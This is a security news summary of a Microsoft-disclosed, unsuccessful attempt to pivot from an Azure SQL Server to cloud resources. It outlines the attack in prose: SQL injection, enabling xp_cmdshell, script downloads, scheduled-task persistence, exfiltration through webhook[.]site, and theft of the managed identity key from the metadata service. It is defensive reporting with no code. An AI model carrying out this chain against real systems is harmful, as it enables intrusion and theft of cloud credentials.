Microsoft has reported a new campaign in which attackers attempted, albeit unsuccessfully, to laterally move to a cloud environment through an SQL Server instance. The attempt was thwarted, but the incident sheds light on the increasing sophistication of cloud-based attack techniques.
Attack Chain Overview:
The attackers initiated the campaign by exploiting a SQL injection vulnerability within an application, gaining access and elevated permissions on a Microsoft SQL Server instance deployed in an Azure Virtual Machine (VM). This provided the threat actors with a foothold.
Next, the attackers aimed to move laterally to additional cloud resources. They exploited the server's cloud identity, which could have facilitated various malicious actions in the cloud had the attempt been successful.
Managed Identities in Cloud Services:
Cloud services, such as Azure, employ managed identities to allocate identities to various cloud resources. These identities are used for authentication with other cloud resources and services. In this instance, the attackers sought to leverage the cloud identity of the SQL Server instance.
Attack Techniques and Progression:
The attack chain began with an SQL injection against the database server, allowing the adversary to gather crucial information. This led to the enabling of the xp_cmdshell option, enabling the execution of operating system commands.
Subsequently, the attackers engaged in reconnaissance, downloaded executables and PowerShell scripts, and established persistence via a scheduled task set to launch a backdoor script.
Data exfiltration was facilitated through a publicly accessible tool called webhook[.]site. This method aimed to blend with legitimate outgoing traffic, reducing the likelihood of detection.
Exploitation of Cloud Identity:
The attackers attempted to utilize the cloud identity of the SQL Server instance by accessing the instance metadata service (IMDS) and obtaining the cloud identity access key. This was a critical step in their bid to conduct operations on cloud resources.
Conclusion:
This incident underscores the evolving complexity of cloud-based attack methodologies. The attackers in this case were actively seeking over-privileged processes, accounts, managed identities, and database connections to carry out their malicious activities. Microsoft's disclosure serves as a crucial reminder of the importance of securing cloud identities to protect SQL Server instances and associated cloud resources from similar risks in the future.
